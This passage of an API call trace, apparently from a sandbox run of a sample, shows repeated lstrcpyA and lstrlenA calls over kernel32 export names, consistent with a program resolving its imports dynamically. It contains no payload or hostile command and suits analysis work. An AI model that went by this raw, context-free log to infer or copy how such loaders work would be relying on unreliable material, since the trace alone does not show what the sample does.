lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.926] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.926] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.926] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.926] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.926] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.926] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.926] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.926] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.926] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.926] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.926] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.926] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.926] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.926] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.926] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.926] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.927] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.927] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.927] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.927] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.927] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.927] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.927] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.927] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.927] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.927] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.927] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.927] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.927] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.927] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.927] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.927] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.927] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.927] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.927] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.927] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.927] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.927] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.927] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.927] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.927] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.927] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.927] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.927] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.927] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.927] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.927] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.927] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.927] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.927] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.927] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.927] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.928] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.928] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.928] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.928] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.928] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.928] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.928] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.928] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.928] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.928] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.928] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.928] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.928] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.928] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.928] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.928] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.928] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.928] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.928] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.928] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.928] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.928] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.928] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.928] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.928] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.928] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.928] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.928] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.928] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.928] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.928] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.928] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.928] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.928] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.928] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.928] lstrlenA (lpString="COPYFILEA") returned 9 [0085.928] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.929] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.929] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.929] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.929] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.929] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.929] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.929] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.929] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.929] lstrlenA (lpString="COPYFILEW") returned 9 [0085.929] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.929] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.929] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.929] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.929] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.929] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.929] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.929] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.929] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.929] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.929] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.929] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.929] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.929] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.929] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.929] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.929] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.929] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.929] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.929] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.929] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.929] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.929] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.929] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.929] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.929] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.929] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.929] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.930] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.930] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.930] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.930] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.930] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.930] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.930] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.930] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.930] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.930] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.930] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.930] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.930] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.930] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.930] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.930] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.930] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.930] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.930] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.930] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.930] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.930] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.930] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.930] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.930] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.930] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.930] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.930] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.930] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.930] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.930] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.930] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.930] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.930] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.930] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.930] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.931] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.931] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.931] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.931] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.931] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.931] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.931] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.931] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.931] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.931] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.931] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.931] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.931] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.931] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.931] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.931] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.931] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.931] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.931] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.931] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.931] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.931] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.931] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.931] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.931] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.931] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.931] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.931] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.931] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.931] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.931] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.931] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.931] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.931] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.931] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.931] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.931] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.932] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.932] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.932] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.932] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.932] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.932] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.932] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.932] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.932] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.932] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.932] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.932] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.932] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.932] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.932] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.932] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.932] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.932] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.932] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.933] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.933] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.933] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.933] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.933] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.933] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.933] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.933] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.933] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.933] 